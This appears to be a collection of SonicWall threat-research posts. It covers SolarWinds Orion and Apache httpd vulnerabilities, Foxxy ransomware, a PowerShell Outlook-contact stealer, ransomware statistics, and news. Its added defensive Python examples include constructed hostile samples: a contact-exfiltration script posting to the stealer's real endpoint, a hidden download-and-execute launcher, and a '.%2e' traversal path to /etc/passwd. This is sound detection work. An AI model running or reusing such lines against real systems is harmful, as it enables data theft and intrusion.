SolarWinds Orion Platform RenderControl.aspx Vulnerability

Overview:

  The SolarWinds Orion Platform is the base platform used by numerous SolarWinds products such as Network Performance Monitor, Virtualization Manager, and Server Configuration Monitor. The platform is designed to seamlessly integrate all Orion-based products into a single interface. The core Orion platform utilizes a web-based interface built using ASP.NET and by default is accessible via HTTP on port 8787.

  An insecure deserialization vulnerability has been reported in SolarWinds Orion, the core platform for multiple SolarWinds products. The vulnerability is due to insufficient validation of user-supplied JSON data submitted to the RenderControl.aspx endpoint.

  A remote, authenticated attacker can exploit this vulnerability by sending a crafted request to the target system. Successful exploitation results in remote code execution under the security context of NETWORK SERVICE.

CVE Reference:

  This vulnerability has been assigned the Common Vulnerabilities and Exposures (CVE) identifier CVE-2021-35215.

Common Vulnerability Scoring System (CVSS):

  The overall CVSS score is 8.9 (CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H/E:P/RL:O/RC:C).

  Base score is 9.9 (AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H), based on the following metrics:
    • Attack vector is network.
    • Attack complexity is low.
    • Privileges required is low.
    • User interaction is none.
    • Scope is changed.
    • Impact of this vulnerability on data confidentiality is high.
    • Impact of this vulnerability on data integrity is high.
    • Impact of this vulnerability on data availability is high.
  Temporal score is 8.9 (E:P/RL:O/RC:C), based on the following metrics:
    • The exploit code maturity level of this vulnerability is proof of concept.
    • The remediation level of this vulnerability is official fix.
    • The report confidence level of this vulnerability is confirmed.

Technical Overview:

  Several UI elements in SolarWinds Orion Platform utilize controls to render customized ASP.NET pages. To load the content of these custom controls, the application sends a POST request to the endpoint “/Orion/RenderControl.aspx”. This endpoint reads the type of the control from the Control parameter and the control’s properties from the config parameter. These parameters can be submitted either via the request-URI query or via a JSON object in the HTTP body of the request. When the endpoint processes the request, it first loads the requested control, then sets each of the control’s properties as set in the config parameter. The control parameters are set by invoking the setter function associated with each property.

  An insecure deserialization vulnerability exists in SolarWinds Orion Platform. The vulnerability is due to a lack of sanitization of parameters sent to the RenderControl.aspx endpoint. This endpoint allows loading an arbitrary control and setting properties of that control to arbitrary values. Because there is no check of whether a given control property setter method is safe to invoke, an attacker may send a malicious control, such as an instance of the SolarWinds.Orion.Web.Actions.ActionPluginBaseView class with a crafted ViewContextJsonString property. This results in invocation of the ParseViewContext() method on the malicious property, which in turn calls the JsonConvert.DeserializeObject() method to deserialize the property as SolarWinds.Orion.Core.Models.Actions.Contexts.AlertingActionContext if the EnviromentType property is set to “Alerting”, or as SolarWinds.Orion.Core.Models.Actions.Contexts.ReportingActionContext if the EnviromentType property is set to “Reporting”. Both of these classes inherit from SolarWinds.Orion.Core.Models.Actions.Contexts.ActionContextBase, which can be leveraged to achieve remote code execution using the known gadget chain used in the public exploit for CVE-2021-31474.

  A remote, authenticated attacker can exploit this vulnerability by sending a crafted serialized object to the target server. Successful exploitation can result in arbitrary code execution under the security context of NETWORK SERVICE.
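As an added example (not SonicWall’s or SolarWinds’ code), the following Python scores web-server request records against the indicators the advisory gives: the /Orion/RenderControl.aspx endpoint, the Control and config parameters arriving either in the query string or in a JSON body, the ActionPluginBaseView control type and the ViewContextJsonString property. The request records and the benign control name OrionCore.Resources.SummaryView are constructed for the example and are not real Orion identifiers.

```python
import json
from urllib.parse import urlsplit, parse_qs

# Identifiers taken from the advisory text; compared case-insensitively.
RENDER_CONTROL_PATH = "/orion/rendercontrol.aspx"
SUSPICIOUS_CONTROLS = {"solarwinds.orion.web.actions.actionpluginbaseview"}
SUSPICIOUS_PROPERTIES = {"viewcontextjsonstring"}

# Constructed sample records (method, url, body); not captured traffic.
# "OrionCore.Resources.SummaryView" is a made-up benign control name.
SAMPLE_REQUESTS = [
    ("POST", "/Orion/RenderControl.aspx",
     json.dumps({"Control": "OrionCore.Resources.SummaryView",
                 "config": {"Title": "Top 10 Nodes"}})),
    ("POST", "/Orion/RenderControl.aspx",
     json.dumps({"Control": "SolarWinds.Orion.Web.Actions.ActionPluginBaseView",
                 "config": {"ViewContextJsonString": "{\"EnviromentType\":\"Alerting\"}"}})),
    ("GET", "/Orion/RenderControl.aspx?Control=OrionCore.Resources.SummaryView"
            "&config=%7B%22Title%22%3A%22x%22%7D", ""),
    ("GET", "/Orion/SummaryView.aspx", ""),
]


def extract_render_control_params(method, url, body):
    """Return (control, config) for a RenderControl.aspx request, or None for
    any other endpoint. As the advisory states, the parameters may arrive in
    the query string or as a JSON object in the POST body; the body wins."""
    parts = urlsplit(url)
    if parts.path.lower() != RENDER_CONTROL_PATH:
        return None
    control, config = None, {}
    query = parse_qs(parts.query)
    if "Control" in query:
        control = query["Control"][0]
    if "config" in query:
        try:
            config = json.loads(query["config"][0])
        except ValueError:
            config = {"_unparsed": query["config"][0]}
    if method.upper() == "POST" and body:
        try:
            payload = json.loads(body)
        except ValueError:
            payload = {}
        control = payload.get("Control", control)
        if isinstance(payload.get("config"), dict):
            config = payload["config"]
    return control, config


def assess_request(method, url, body):
    """List the reasons a request matches the advisory's indicators; an empty
    list means nothing matched."""
    params = extract_render_control_params(method, url, body)
    if params is None:
        return []
    control, config = params
    reasons = []
    if control and control.lower() in SUSPICIOUS_CONTROLS:
        reasons.append("control type %s is loaded" % control)
    for prop in config:
        if prop.lower() in SUSPICIOUS_PROPERTIES:
            reasons.append("property %s is set via config" % prop)
    return reasons


def scan(requests):
    """Return (index, reasons) for every request that produced a finding."""
    findings = []
    for i, (method, url, body) in enumerate(requests):
        reasons = assess_request(method, url, body)
        if reasons:
            findings.append((i, reasons))
    return findings


if __name__ == "__main__":
    for index, reasons in scan(SAMPLE_REQUESTS):
        print("request %d flagged: %s" % (index, "; ".join(reasons)))
```

The control and property names are matched case-insensitively because ASP.NET property binding is not case-sensitive; a rule that only matched the exact spelling from the advisory would be trivially bypassed.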

Triggering the Problem:

  • The target system must have the vulnerable product installed and running.
  • The attacker must have network connectivity to the target server.
  • The attacker must authenticate to the target application.

Triggering Conditions:

  The attacker authenticates to the target application. Next, the attacker sends a crafted HTTP request to the target server. The vulnerability is triggered when the server processes the request.

Attack Delivery:

  The following application protocols can be used to deliver an attack that exploits this vulnerability:
    • HTTP, over port 8787/TCP

SonicWall’s Intrusion Prevention System (IPS) provides protection against this threat:

  • IPS: 2168 SolarWinds Orion RenderControl Insecure Deserialization

Remediation Details:

  The risks posed by this vulnerability can be mitigated or eliminated by:
    • Applying the vendor supplied patch resolving the vulnerability.
    • Upgrading to a version unaffected by the vulnerability.
    • Detecting and filtering malicious traffic using the signature above.
  The vendor has released the following advisory regarding this vulnerability:
  Vendor Advisory

Foxxy RaaS released. Decryption key and function present in sample

The SonicWall Capture Labs threat research team has come across new ransomware known as Foxxy. This ransomware appeared in late October 2021, and the sample we have obtained appears to be a proof of concept that has been released into the wild from an unknown source. After further investigation, we discovered that this ransomware is from a suite of services supplied by the operator. The malware charges 0.9 BTC (around $55k USD at this time) for file recovery. However, there is no way to communicate with the operators.

Infection Cycle:

The malware uses the following icon:

Upon infection, the malware encrypts files on the system and appends “.foxxy” to their filenames. The following message is shown on the desktop:

The following file is added to the system:

  • %USERPROFILE%\Desktop\___RECOVER__FILES__.foxxy.txt

___RECOVER__FILES__.foxxy.txt contains the following message:

The malware is written in C# for the .NET framework and is easy to decompile. Decompilation reveals the intent of the malware and shows the encryption key and ransom message:

The encryption function and key can be clearly seen in the code. It uses Rijndael symmetric encryption. Because the encryption method is symmetric, the key used for encryption can also be used for decryption, as long as the same “randomSalt” value is used:

The malware also includes the decryption function. With most ransomware this is not the case: operators usually only supply decryption software after payment:

The malware supplies “foxxy.tiiny.site” as an email address for file recovery consultation. However, this is not an email address. It is a website that sells Foxxy ransomware:

In addition to selling Foxxy ransomware, the operators sell various other services such as DDoS and password cracking:

The “Malware (Raas)” button leads to the following page detailing the features of Foxxy ransomware:

This site has since been taken offline.

There has been some activity at the supplied bitcoin address, but it is unclear whether this is the result of the ransomware itself:

SonicWall Capture Labs provides protection against this threat via the following signature:

  • GAV: Foxxy.RSM (Trojan)

This threat is also detected by SonicWall Capture ATP w/RTDMI and the Capture Client endpoint solutions.

How Unified Cloud Simplifies Network Switch Management

SonicWall Wireless Network Manager (WNM) unifies and simplifies network switches, access points, and network-wide configuration control.

Network managers are busy and getting busier. Not only do they have record-breaking cyberthreats and new security mandates piling up, but they also have the day-to-day tasks of managing resources, provisioning assets, and monitoring the entire network ecology. Then there are the productivity issues of having to do it all and not get lost in layers of software accounts and user interfaces.

Network switches help control the complexity. Switches are an essential tool for connecting computers, servers, and other network resources. They’re also a primary means of controlling devices and traffic and adjusting a network’s security profile whenever necessary.

Unified cloud management is the natural next step in managing network switches. At the simplest level, unified cloud management lets administrators configure and monitor thousands of switch ports instantly over the web. Dive deeper, and there is a panoply of capabilities that allow IT teams to work smarter – accomplishing major tasks with just a few clicks on a cloud-based interface and without deploying on-site smart hands to guide processes.

Next Level Network Switch Management

SonicWall Wireless Network Manager (WNM) is the “next level” unified cloud management system. WNM is designed to give IT teams an intuitive tool for one-touch wireless and switching network management capabilities while giving them data-rich analytics and easy onboarding workflows from a single pane of glass. In addition, WNM’s cloud-based infrastructure helps simplify access, control and troubleshooting by unifying multiple tenants, locations and zones.

From one interface, managers provision remote sites, deploy network-wide configuration changes and manage campus and distributed networks. SonicWall WNM significantly reduces dedicated technical training and deploying dedicated staff to smart-touch devices and other resources by working via the cloud.

In addition, cloud-managed switches and access points offer further cloud-based management functionality. For example, they automatically discover wired and wireless devices connected to a network and then draw the topology, enabling network administrators to troubleshoot issues remotely and quickly.

WNM supports thousands of SonicWave Access points and SonicWall Switches without the cost of complex overlay management systems. With the release of WNM 3.5, administrators can control SonicWall switches and existing SonicWave access points all at once. Onboarding and deployment of SonicWall switches and access points are automatic and networks are up in minutes.

Single-pane-of-glass Network Management

We mentioned WNM’s single-pane-of-glass design. What this means is that WNM provides an intuitive dashboard that not only simplifies control but also unifies visual data. In addition, it comes as an integrated part of the SonicWall Capture Security Center ecosystem, where IT teams can efficiently and effectively manage just about every aspect of networks of any size.

Administrators can drill down to specific managed devices for granular data and status, plus examine a detailed view of network hierarchy right down to single policies created at the tenant level that are pushed down to various locations and zones. In addition, WNM is highly scalable, from a single site to global enterprise networks with tens of thousands of managed devices supporting multiple tenants.

Stable and Reliable Operations

WNM delivers the stability and reliability of the cloud. During an Internet outage, access points and switches can continue to work without WNM, ensuring business continuity. Two-factor authentication and packet encryption heighten security. Automatic firmware and security updates keep managed devices up to date. Selectively apply Production, Beta or Patch firmware on each managed device as needed. Automatically send reports to multiple recipients at the same time.

Zero-Touch Deployment and Advanced Analysis Tools

With WNM and Zero-Touch Deployment, an array of SonicWall switches can be up and running in minutes. Register and onboard the devices from anywhere with the SonicExpress app. Plus, WNM’s topology tool provides network topology maps and managed device statistics for quick visual analysis of every aspect of the network.

Lower Total Cost of Ownership

SonicWall Wireless Network Manager drives down the total cost of ownership by shifting capital expenditures to operating expenses. Wireless Network Manager cuts out the cost and maintenance of redundant hardware-based controllers and optimizes data center rack space. In addition, its intuitive interface reduces training and administrative overhead costs.

Even with a limited staff, and no matter the size of your network, SonicWall Wireless Network Manager offers unified visibility and control in a secure, Wi-Fi cloud-managed solution. To learn more, visit sonicwall.com/wnm.

Cybersecurity News & Trends – 10-29-21

News outlets continue quoting the Mid-Year Update to the 2021 SonicWall Cyber Threat Report.  Meanwhile, SonicWall’s The Year of Ransomware report catches attention with third-quarter data: a 148% surge in global ransomware attacks making 2021 the worst year ever recorded. In industry news, hackers launch SEO poisoning, Microsoft launches a cybersecurity job campaign, U.S. cyber teams take down REvil, and Russian hackers hide behind American home Wi-Fi networks.


SonicWall in the News

‘The Year of Ransomware’ Continues with Unprecedented Late-Summer Surge

AIThority: Citing SonicWall’s “The Year of Ransomware” report, there was a 148% surge in global ransomware attacks (495 million) year to date. The third-quarter surge makes 2021 the worst year SonicWall has ever recorded.

The World Is Now Facing a Spate of Coordinated Cyber Attacks

Telecom TV: Ransomware incursions have reached “pandemic levels” while old-fashioned DDoS attacks still pack a punch. Meanwhile, “never-before-seen” malware variants are emerging every day, according to a recent cyber threat report from SonicWall. The author goes on to name SonicWall “the world’s most quoted expert on ransomware.”

Unprecedented and Coordinated Cyber Attacks

National Security News: An “unprecedented” and “coordinated” spate of cyberattacks is hitting many U.K. VoIP services. So says the Comms Council in the U.K. There have been 495 million known ransomware attacks perpetrated so far this year, according to a recent threat report from SonicWall titled “The Year of Ransomware.”

Thwarting Phishing Threats with Simulations

Security Boulevard: Social engineering schemes continue to flourish, making their way into company inboxes with the intent to mislead employees into downloading malicious software. How likely is this to happen to your company? According to SonicWall, there was a record-high 304.7 million ransomware attacks in the first half of 2021. So the short answer is, it’s very likely.

How Safe is the U.K. From Cybercrime?

TechMonitor: The U.K. comes fifth in a new global ranking that combines five cybersecurity and anti-money laundering protections indices. The author notes the growing importance of countering phishing and ransomware attacks, significantly as the latter has increased by 151% in the first half of 2021, from the same period in 2020, according to the mid-year update on SonicWall’s Cyber Threat Report.

The Invisible War

Handelsblatt (Germany): An outstanding article in one of Germany’s most important daily newspapers mentions SonicWall as an expert in cybersecurity and quotes the 2021 Cyber Threat Report Mid-Year Update. The authors cite several vital stats from the report to explain the rise of various threats that have weakened cybersecurity throughout the world. The article appeared online and in the print issue of the publication.

How to Create a Relevant Cybersecurity Strategy

Accounting Web (U.S.): Using SonicWall’s Mid-Year Update on the 2021 Cyber Threat Report, the author illustrates the sharp rise in cybersecurity attacks. The article is mostly about how CPAs and other accounting professionals play a crucial role in protecting financial data. However, the author also provides an overview of the most common cyberattacks, such as malware and phishing, and offers tips on making sure your organization has the proper protections in place.

‘Clumsy’ BlackByte Malware Reuses Crypto Keys, Worms into Networks

Dark Reading (U.S.): A unique malware named “BlackByte” was discovered during a recent incident response engagement. The malware reportedly avoids Russian computers and uses a single symmetric key for encrypting every compromised system. Additionally, the report cites SonicWall’s “Cyber Threat Report: Mid-Year Update” and notes that the number of ransomware attacks in the first half of the year rose 150% to almost 305 million.


Industry News

Ransomware Gangs Use SEO Poisoning to Infect Visitors

Bleeping Computer: SEO poisoning, also known as “search poisoning,” is an attack method that relies on optimizing websites using ‘black hat’ SEO techniques to rank higher in Google search results. Due to their high ranking, victims who land on these sites believe they are legitimate, and actors enjoy a heavy influx of visitors who look for specific keywords. According to this story, two campaigns have surfaced recently. One is linked to Gootloader and the other to the SolarMarker backdoor. Most campaigns deploy SEO poisoning payloads via PDFs that drop the malware into the victim’s device. Additionally, threat actors use redirects to prevent their sites from being removed from search results. Adding to the problem, threat actors also hacked the Formidable Forms plugin found on many WordPress websites.

Microsoft Launches Campaign to Fill 250,000 Cybersecurity Jobs

Axios: Microsoft announced Thursday that it’s launching a national campaign to help fill 250,000 cybersecurity jobs in the U.S. by 2025, including providing a free curriculum to every public community college. The company’s president Brad Smith warned that the current workforce shortage is at crisis levels and threatens to undermine the country’s ability to protect itself against cyber and ransomware attacks.

U.S. to Create Diplomatic Bureau to Lead Cybersecurity Policy

Dark Reading: Plans are underway to revitalize the State Department and make cybersecurity a core priority with the addition of 500 new civil service positions, a 50% increase in its information technology budget, and the creation of the Bureau of Cyberspace and Digital Policy, officials have announced.

Ransomware Hackers Freeze Millions in Aid for Papua New Guinea

Bloomberg: The government’s payment system was locked by attackers last week. Hackers demanded payment from the nation hard hit by Covid-19. While government officials restored the system, they claimed they did not pay a ransom.

Martin County Tax Collector’s Possibly Hit by Ransomware Attack

WPTV News: A possible ransomware attack may have caused a lengthy closure of the Martin County Tax Collector’s offices for nearly two weeks. The Florida county office has been sending residents to a nearby county for help with processing payments. WPTV news investigated the incident when county officials did not explain the lengthy “network problems” they were experiencing.

Avista Warns Customers of Ransomware Attack

KXLY News: Avista, the chief energy provider for the Pacific Northwest, announced that one of its energy efficiency vendors was the target of a ransomware attack earlier this month. The company said it doesn’t believe any of its customers’ sensitive information was compromised. However, the company also noted that hackers got access to customers’ email addresses, utility numbers, service addresses and energy usage.

Feds Take Down Top Ransomware Hacker Group REvil

The Verge: The government has successfully hacked the hacking group REvil, the entity behind the ransomware that has been linked to Apple data leaks, attacks on enterprise software vendors, and more, according to a report from Reuters. The outlet’s sources tell it that the FBI, Secret Service, Cyber Command, and organizations from other countries have worked together to take the group’s operations offline this month. In addition, the group’s dark web blog, which exposed information gleaned from its targets, is also reportedly offline.

Russian Hackers Reportedly Hid Behind Americans’ Home Networks to Mask Their Activities

Gizmodo: In case you missed it, the “SolarWinds” hackers are back. A recent report from Microsoft researchers shows that certain cyber-spies—believed to be members of Russia’s Foreign Intelligence Service—have been targeting droves of American tech firms with a new hacking campaign. According to Microsoft and other sources, Russian military hackers used weaknesses in home WiFi networks to wage hacking campaigns against high-level American targets.


In Case You Missed It

Apache Httpd Traversal Vulnerability

Overview:

  The Apache HTTP server is the most popular web server used on the Internet. The server is capable of being utilized with many different options and configurations. A wide variety of runtime loadable plug-in modules can be used to extend its functionality.

  A directory traversal vulnerability exists in Apache httpd. The vulnerability is due to improper normalization of paths in the request URI.

  A remote attacker could exploit the vulnerability by sending a crafted HTTP request to the target server. Successful exploitation would result in disclosure of the content of files outside the expected document root, or in the worst case, execution of arbitrary code under the security context of the server process.

CVE Reference:

  This vulnerability has been assigned the Common Vulnerabilities and Exposures (CVE) identifier CVE-2021-41773.

Common Vulnerability Scoring System (CVSS):

  The overall CVSS score is 9.3 (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H/E:F/RL:O/RC:C).

  Base score is 10.0 (AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H), based on the following metrics:
    • Attack vector is network.
    • Attack complexity is low.
    • Privileges required is none.
    • User interaction is none.
    • Scope is changed.
    • Impact of this vulnerability on data confidentiality is high.
    • Impact of this vulnerability on data integrity is high.
    • Impact of this vulnerability on data availability is high.
  Temporal score is 9.3 (E:F/RL:O/RC:C), based on the following metrics:
    • The exploit code maturity level of this vulnerability is functional.
    • The remediation level of this vulnerability is official fix.
    • The report confidence level of this vulnerability is confirmed.

Technical Overview:

  When httpd receives an HTTP request, it is handled by the ap_process_async_request() function. The request data is processed by the ap_process_request_internal() function. This function normalizes the path submitted in the request URI by calling the ap_normalize_path() function. This function normalizes the path submitted by decoding URL-encoded characters, collapsing multiple slash (‘/’) characters, and interpreting “../” by traversing to the parent directory in the path.

  After the normalization function, the ap_run_translate_name() function is called, which calls translate_alias_redir(). This function calls try_alias_list(), which looks up any ScriptAlias entries in the httpd server configuration file that match the request URI. If a match is found, apr_filepath_merge() is called, which merges the server root path with the normalized path. The merged path is later saved to the filename field of the request_rec structure. Next, access permissions are checked by calling ap_run_access_checker_ex(), which looks up the appropriate Require entries in the httpd server configuration.

  If access is allowed, the appropriate handler is invoked for processing the request. If the request URI path begins with “/cgi-bin/”, and the mod_cgi module is enabled in the server configuration, the cgi_handler() function is called to handle the request. This function uses the filename field of the request_rec structure to build an OS command and runs the command in a child process. Then, the HTTP POST request data submitted is sent to the created process as input.

  A directory traversal vulnerability exists in Apache httpd. The vulnerability is due to a flaw in the normalization of the path submitted in the URI of HTTP requests. The ap_normalize_path() function attempts to resolve “../” sequences in the path by traversing to the parent directory. However, if the second dot character (‘.’) in a “../” sequence is URL-encoded (i.e. “.%2e/”), the “../” sequence will not be interpreted and the sequence will remain in the normalized path. When this path is later merged with the server root path using the apr_filepath_merge() function, the resulting path saved to the filename field of the request_rec structure could traverse beyond the server root path. If access is granted to the server’s root directory and the mod_cgi module is enabled, an arbitrary executable on the server can be called, leading to arbitrary code execution.

  A remote attacker could exploit this vulnerability by sending a request with a crafted URI to the target service. Successful exploitation could lead to exposure of the contents of arbitrary files on the server. If the mod_cgi module is enabled, exploitation could lead to execution of arbitrary code on the target server.
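As an added illustration (not httpd’s own code), the following Python models the ordering flaw described above: a normalizer that tests each segment for “..” before percent-decoding it lets the “.%2e” segment survive into the merge step, where generic path logic then resolves it as a parent-directory reference. The hardened variant decodes first, resolves dot segments, refuses any path that would climb above the root, and a final containment check on the merged filesystem path acts as defence in depth. The document root and request paths are constructed for the example.

```python
import posixpath
from urllib.parse import unquote

DOC_ROOT = "/srv/www/htdocs"   # constructed document root for the example


def normalize_vulnerable(uri_path):
    """Simplified model of the flawed normalizer: the test for ".." is made on
    the raw segment *before* percent-decoding, so ".%2e" is not recognised as
    a parent reference and only becomes ".." afterwards."""
    out = []
    for seg in uri_path.split("/"):
        if seg in ("", "."):
            continue                    # collapse "//" and "/./"
        if seg == "..":
            if out:
                out.pop()               # a literal "../" is handled correctly
            continue
        out.append(unquote(seg))        # decoded too late: ".%2e" becomes ".."
    return "/" + "/".join(out)


def normalize_fixed(uri_path):
    """Decode each segment first, then resolve dot segments; a path that would
    climb above "/" or that smuggles a separator inside a segment is rejected."""
    out = []
    for raw in uri_path.split("/"):
        seg = unquote(raw)
        if seg in ("", "."):
            continue
        if seg == "..":
            if not out:
                return None             # would escape the root: reject
            out.pop()
            continue
        if "/" in seg or "\\" in seg:
            return None                 # "%2f" must not create a new segment
        out.append(seg)
    return "/" + "/".join(out)


def merge_with_root(root, normalized):
    """Models the later merge step: join root and path, then let generic path
    logic resolve any ".." that survived normalization."""
    return posixpath.normpath(root + normalized)


def is_inside_root(root, merged):
    """Containment check on the final path: it must be the root itself or lie
    strictly below it."""
    root = root.rstrip("/")
    return merged == root or merged.startswith(root + "/")


def resolve(uri_path, normalizer):
    """Run one request path through a normalizer and the merge; return the
    filesystem path that would be opened, or None if the normalizer refused."""
    normalized = normalizer(uri_path)
    if normalized is None:
        return None
    return merge_with_root(DOC_ROOT, normalized)


if __name__ == "__main__":
    sample = "/.%2e/.%2e/.%2e/etc/passwd"   # uses the ".%2e/" form from the advisory
    for name, fn in (("vulnerable", normalize_vulnerable), ("fixed", normalize_fixed)):
        path = resolve(sample, fn)
        print(name, "->", path, "inside root:" , path is not None and is_inside_root(DOC_ROOT, path))
```

Even with the decoding order corrected, the containment check on the merged path is worth keeping: it catches any future normalizer bug, and it is cheap compared with the cost of serving a file from outside the document root.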

Triggering the Problem:

  • The target system must have the vulnerable product installed and running.
  • The attacker must have network connectivity to the affected ports.
  • Permissions must be granted to the server’s root directory in the httpd.conf configuration file.
  • For arbitrary code execution on the target server, the mod_cgi module must be enabled in the httpd.conf configuration file.

Triggering Conditions:

  The attacker sends an HTTP request with a maliciously crafted URI path. The vulnerability is triggered when the server attempts to process the HTTP request.

Attack Delivery:

  The following application protocols can be used to deliver an attack that exploits this vulnerability:
    • HTTP, over port 80/TCP
    • HTTPS, over port 443/TCP

  Http Request:

  Http Request In Text:

  Password File:

SonicWall’s Intrusion Prevention System (IPS) provides protection against this threat:

  • IPS: 2140 Web Application Directory Traversal 48

Remediation Details:

  The risks posed by this vulnerability can be mitigated or eliminated by:
    • Applying the vendor-supplied patch to eliminate this vulnerability.
    • Filtering traffic based on the signature above.
  The vendor has released the following advisory regarding this vulnerability:
  Vendor Advisory

PowerShell script that steals email addresses from Outlook

SonicWall Threats Research team has observed an obfuscated batch (BAT) file inside an archive, delivered to the victim’s machine as an email attachment. The BAT file executes a PowerShell script which steals email addresses from Outlook contacts and sends them to a remote machine:

BATCH SCRIPT:

The batch script contains a PowerShell cmdlet which communicates over HTTPS to fetch and execute a remote PowerShell script:

PowerShell SCRIPT:

The PowerShell script is responsible for stealing and sending Outlook contacts email addresses to the remote machine.

The PowerShell script checks for the presence of the file ‘$env:APPDATA\Microsoft\.Outlook’ to ensure that it executes only once on a machine. If the file is already present, the script does not execute:

The PowerShell script enumerates Outlook contacts and retrieves their email addresses, adding them to a global list. However, the code as written will not work: it needs a correction to a variable name and to a property field, as highlighted in the snippet below:

The stolen email addresses are sent to the remote machine at “https://puwq9m8p.educabrasil.live/gravadados.php?lista=”:
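As an added example (not SonicWall’s code and not the sample itself), the following Python scores PowerShell or batch text against indicators of this stealer. The run-once marker file and the exfiltration endpoint come from the write-up above; the remaining patterns (Outlook COM automation, the contacts folder, a download-and-execute launcher) are generic assumptions about how such a script behaves. The three script samples are constructed for the example; the launcher’s stage.example.invalid host is a placeholder.

```python
import re

# (name, pattern, weight). The first two come from the write-up; the rest are
# generic assumptions about Outlook COM automation and download cradles.
INDICATORS = [
    ("marker_file",     re.compile(r"\$env:APPDATA\\Microsoft\\\.Outlook", re.I), 3),
    ("exfil_url",       re.compile(r"educabrasil\.live/gravadados\.php\?lista=", re.I), 5),
    ("outlook_com",     re.compile(r"New-Object\s+-ComObject\s+Outlook\.Application", re.I), 2),
    ("contacts_folder", re.compile(r"GetDefaultFolder\s*\(\s*10\s*\)|olFolderContacts", re.I), 2),
    ("remote_exec",     re.compile(r"\b(IEX|Invoke-Expression)\b[^\n]*?"
                                   r"\b(DownloadString|Invoke-WebRequest|Invoke-RestMethod|iwr|irm)\b", re.I), 3),
    ("web_send",        re.compile(r"\b(DownloadString|Invoke-WebRequest|Invoke-RestMethod)\b"
                                   r"\s*\(?\s*['\"]https?://", re.I), 1),
    ("hidden_launch",   re.compile(r"-w(indowstyle)?\s+hidden|-e(p|xecutionpolicy)\s+bypass", re.I), 2),
]
THRESHOLD = 5   # chosen so that the exfil URL alone, or launcher plus cradle, is enough

# Constructed samples, not the real files from the write-up.
SAMPLE_STEALER = r'''
$marker = "$env:APPDATA\Microsoft\.Outlook"
if (Test-Path $marker) { exit }
New-Item -Path $marker -ItemType File | Out-Null
$outlook = New-Object -ComObject Outlook.Application
$contacts = $outlook.GetNamespace("MAPI").GetDefaultFolder(10).Items
$list = @()
foreach ($c in $contacts) { $list += $c.Email1Address }
(New-Object Net.WebClient).DownloadString("https://puwq9m8p.educabrasil.live/gravadados.php?lista=" + ($list -join ","))
'''

SAMPLE_LAUNCHER = r'''
@echo off
powershell -w hidden -ep bypass -c "IEX (New-Object Net.WebClient).DownloadString('https://stage.example.invalid/run.ps1')"
'''

SAMPLE_BENIGN = r'''
Get-Process | Sort-Object CPU -Descending | Select-Object -First 5
Get-ChildItem "$env:APPDATA\Microsoft" | Out-File report.txt
'''


def score_script(text):
    """Return (total weight, names of matched indicators) for one script."""
    hits = [(name, weight) for name, rx, weight in INDICATORS if rx.search(text)]
    return sum(w for _, w in hits), [n for n, _ in hits]


def is_suspicious(text, threshold=THRESHOLD):
    """True when the weighted indicator score reaches the threshold."""
    score, _ = score_script(text)
    return score >= threshold


if __name__ == "__main__":
    for label, text in (("stealer", SAMPLE_STEALER), ("launcher", SAMPLE_LAUNCHER), ("benign", SAMPLE_BENIGN)):
        score, hits = score_script(text)
        print("%-8s score=%2d suspicious=%s hits=%s" % (label, score, is_suspicious(text), hits))
```

The weights are deliberately uneven: the exfiltration endpoint is specific to this campaign and is conclusive on its own, while Outlook COM automation or a hidden PowerShell launch are individually common in legitimate administration scripts and only count when they appear together.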

 

The archive file is not available on any of the popular threat intelligence sharing portals such as VirusTotal and ReversingLabs, which indicates its uniqueness and limited distribution:

Evidence of detection by the RTDMI™ engine can be seen below in the Capture ATP report for this file:

Cyber Threat Alert: Ransomware Breaks Another Record

As the ‘Year of Ransomware’ roars on, SonicWall observes 3rd Quarter with another unprecedented, record-breaking surge in attacks.

In July 2021, SonicWall released its widely quoted Mid-Year Update to the 2021 SonicWall Cyber Threat Report with alarming news of the sharp rise in ransomware and other malicious attacks. We’re back again with more data and a message: ransomware’s rise has not slowed.

This year was already proving to be the most active year for cyberattacks on record. After posting a groundbreaking 188.9 million ransomware attacks in the second quarter of 2021, SonicWall Capture Labs threat researchers have found that ransomware attacks broke another record of 190.4 million in the third quarter. The total 495.1 million ransomware attacks represent a 148% year-to-date increase over 2020, making 2021 the most costly and dangerous year on record.

A Nearly Unimaginable Upward Trend

The 190.4 million ransomware attacks in the third quarter is the highest ever recorded by SonicWall. Additionally, the statistic nearly eclipses the 195.7 million total ransomware attacks recorded during the first three quarters of 2020.

“As we see it, ransomware is on a nearly unimaginable upward trend, which poses a major risk to businesses, service providers, governments and everyday citizens,” SonicWall President and CEO Bill Conner said in the official release.

Despite movements to secure cyber infrastructures from respective national governments, the U.K. has seen a 233% surge in the number of ransomware attacks, and the U.S. has witnessed a 127% year-to-date increase.

Cyberattacks: A Severe Global Crisis

The sheer volume of attacks elicits words like “global crisis,” “ruthless,” and “a significant national security threat.” Yet, many people appear to be determined to restore a sense of normalcy while this severe global crisis roils on.

“Cybercriminals have never let up, driving ransomware campaigns to record numbers through the first three quarters of 2021,” said Conner. “These criminal organizations will continue to launch highly sophisticated cyberattacks that are designed to target organizations and business with weak or lax security controls.”

A summary of SonicWall Q3 2021 findings:

  • 148% surge in global ransomware attacks in 2021, the worst year SonicWall has ever recorded
  • 714 million ransomware attacks predicted by the close of 2021
  • 1,748 ransomware attempts per customer through the third quarter
  • 33% rise in IoT malware globally; upticks in North America and Europe
  • 21% increase in cryptojacking with massive 461% growth across Europe

Another Growing Concern: Increases in Unique Malware Variants

Amid the stats, there is another reason for concern: SonicWall Real-Time Deep Memory Inspection™ discovered 307,516 never-before-seen malware variants during the first three quarters of 2021 — a 73% year-to-date increase. That’s an average of 1,126 new malware variants discovered each day in 2021.

The rise in variants points to a maturation in cybercriminals’ ability to rapidly diversify the tactics they use to attack organizations, their networks and their users. Coupled with a constant flood of cyberattacks, businesses and individuals will find it increasingly difficult to protect themselves with old or expired cybersecurity technology.

Patented RTDMI™ technology is part of the cloud-based Capture Advanced Threat Protection (ATP) sandbox service. Among several patented innovations, RTDMI leverages memory inspection and CPU instruction-tracking with machine-learning capabilities. As a result, the system efficiently recognizes and mitigates cyberattacks, including threats that do not initially show malicious behavior.

The Grace Period Has Come to an End

All told, SonicWall logged 1,748 ransomware attempts per customer through the third quarter. From another perspective, this is the equivalent of 9.7 ransomware attempts per customer per business day. With the increased ability to diversify their means of attack, criminals have a growth business on their hands.

